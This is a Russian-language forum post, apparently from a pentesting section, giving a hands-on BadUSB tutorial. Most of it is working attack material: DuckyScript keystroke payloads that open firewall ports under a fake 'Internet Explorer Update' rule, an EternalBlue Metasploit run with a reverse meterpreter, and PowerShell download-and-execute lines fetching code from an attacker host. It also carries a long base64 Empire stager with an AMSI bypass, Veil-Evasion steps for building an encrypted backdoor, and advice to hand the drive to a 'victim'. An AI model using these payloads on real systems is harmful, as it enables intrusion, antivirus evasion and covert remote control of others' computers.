Актуально Авторская статья - Введение в BadUSB часть 2.

Тема в разделе "Пентестинг", создана пользователем yarr, 24 окт 2017.

  1. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Наконец-то допилил статью. Надеюсь примеры получились понятные.
    Ув. @NightWos, доделал 2 часть. Просьба выдать VC и тег.
  2. yarr

    yarr

    Сообщения:
    323
    Баллы:
    18
    Вступление.
    Мы будем работать с Kali Linux, ОС на целевой машине - Windows 7 x64. Для доставки добра мы используем смартфон с NetHunter на борту, флешку с Phison 2251-03 или USB Rubber Ducky (актуально для других девайсов с поддержкой DuckyScript, изучите особенности синтаксиса и компиляции payload на своем устройстве).

    1. Разведка показала, что ПК уязвим к EnternalBlue, а порты 445 и 135, нужные нам для атаки, закрыты.

    DELAY 100 // в "боевом режиме", надо ставить больше, ведь еще должны установиться драйвера. Можно использовать DEFAULT_DELAY
    GUI r
    DELAY 100
    STRING powershell -Command "Start-Process cmd -Verb RunAs"
    ENTER
    DELAY 500 // это на быстрой машине, для тестов на других, старых ноутбуках я увеличил значение до 7000 для надежности, этого должно везде хватить
    LEFTARROW
    ENTER
    DELAY 100
    STRING color F8
    STRING mode con:cols=14 lines=14 lines=1
    DELAY 100
    STRING netsh advfirewall firewall add rule name="Internet Explorer Update" protocol="TCP" localport=445,135 action=allow dir=IN
    ENTER
    STRING exit

    # msfconsole
    # use exploit/windows/smb/ms17_010_eternalblue
    # set payload windows/x64/meterpreter/reverse_tcp
    # set rhost 192.168.1.48 //это атакуемая машина
    # set lhost 192.168.1.42 //это наша машина
    # exploit
    meterpreter >

    Общая схема работы будет, как и в предыдущем примере. Плюсы модуля заключаются в высокой скорости и низкой вероятности детектирования AV. Он ничего не пишет на диск, так что не оставит следов по окончании работы. На этот раз нашей целью будет Windows 10 x64. Доставлять код будем так же с помощью смартфона, прошитого NetHunter, зараженной флешки или USB Rubber Ducky.
    # msfconsole
    # use exploit/multi/script/web_delivery
    # set LHOST 192.168.0.5 //Ваше значение, указываем программе, откуда брать бинарники
    # set LPORT 443
    # set URIPATH /
    # set TARGET 2
    # set PAYLOAD windows/meterpreter/reverse_https
    # exploit

    powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://192.168.0.5:8080/');
    Может пригодится для удобства остановки и возобновления прослушки порта. Файл назовем usb.rc
    DELAY 100
    GUI r
    DELAY 200
    STRING powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://192.168.0.5:8080/');
    ENTER

    Для тех, у кого возникнут проблемы с работой web_delivery - тут есть общая информация по работе с модулем.
    Тут почти то же самое, что и в случае с web_delivery. Только другие опции и интерфейс.
    # cd tools
    # git clone

    # listeners
    # set Name Host78
    # list
    # usestager Launcher
    # set Listener Host78
    # exe
    # execute

    STRING powershell -W Hidden -nop -noni -enc WwBSAGUAZgBdAC4AQQBzAHMARQBNAGIATAB5AC4ARwBFAFQAVAB5AHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkARQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBsAFUAZQAoACQAbgBVAEwAbAAsACQAdABSAFUAZQApAH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAcgB2AGkAQwBFAFAAbwBJAE4AdABNAEEATgBBAEcAZQBSAF0AOgA6AEUAWABwAEUAYwB0ADEAMAAwAEMATwBOAFQASQBOAFUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBiAEoAZQBDAFQAIABTAHkAUwB0AEUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAGUAQQBkAEUAUgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIAbwB4AHkAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAEUAQgBSAEUAUQB1AGUAcwBUAF0AOgA6AEQARQBGAGEAdQBMAHQAVwBFAEIAUAByAE8AeAB5ADsAJABXAEMALgBQAFIAbwBYAFkALgBDAFIARQBkAGUAbgB0AEkAQQBMAFMAIAA9ACAAWwBTAHkAcwBUAEUATQAuAE4ARQB0AC4AQwByAEUARABlAE4AdABpAEEAbABDAEEAQwBoAGUAXQA6ADoARABFAEYAQQBVAEwAVABOAEUAVABXAE8AUgBrAEMAUgBFAEQAZQBOAHQASQBhAGwAUwA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAEMATwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAWQB0AEUAcwAoACcAYwBJAHAAMABDADwASgAtAHMAbABUAF8AXgBAAGkANABQAEcALAA4AHgAWABGACsAZgBFAFIAMwB2AEQAfgBkACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABFAHIAcwAuAEEARABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AeABiADEAcgBKAGoATABuAGwANQBKAGsAMABqADEATgAxAFYAZABoAHgAZwByAE8ANgArAFkAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABEAGEAVABBAD0AJABXAEMALgBEAE8AdwBOAGwAbwBhAGQARABhAFQAYQAoACQAcwBlAFIAKwAkAHQAKQA7ACQAaQBWAD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAEEAdABBAFsANAAuAC4AJABEAGEAdABhAC4ATABFAG4ARwB0AEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
    DELAY 100
    GUI r
    DELAY 200
    STRING //тут код из-под спойлера выше, либо код вида powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('

    Для тех, у кого возникнут проблемы с работой Empire - тут есть общая информация по работе с Фреймворком
    [SIZE=5]Меня уже несколько раз спаршивали про удаленный доступ. Рассмотрим пример с Veil-Evasion.[/SIZE]
    [FONT=Courier New][SIZE=5]# apt-get -y install git
    # git clone [URL][URL]https://github.com/Veil-Framework/Veil-Evasion.git[/URL][/URL]
    # cd Veil-Evasion/
    # cd setup
    # setup.sh -c[/SIZE]
    [FONT=Courier New][SIZE=5]# cd /root/Veil-Evasion
    # python Veil-Evasion.py
    # list
    # use 32 // нам нужен python/meterpreter/reverse_https
    # set LHOST 37.119.32.125 //Ваш публичный IP
    # set LPORT 443 //по умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80)
    # set USE_PYHERION Y (используем энкриптор)
    # generate (создаем .exe файл) // далее Вводим имя создаваемого файла, Выбираем вторую строку, жмем 2.

    После компиляции кода подкидываем флешку жертве[/SIZE][/FONT][/FONT]

    [FONT=Courier New][SIZE=5]Для доставки жертве используем RubberDucky, потому, что payload можно поместить прямо на SD. Либо же использовать способы, описанные выше.[/SIZE][/FONT]


    [FONT=Courier New]P.S. [/FONT][I][I][I][FONT=Courier New]Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.[/FONT][/I][/I][/I]

    [FONT=Courier New]P.P.S. Обзор рассчитан на пользователей, только начинающих работать с MSF и прочими инструментами для тестирования на проникновение в качестве практического примера. Так что не надо срать по этому поводу в теме.[/FONT]

Поделиться этой страницей

Top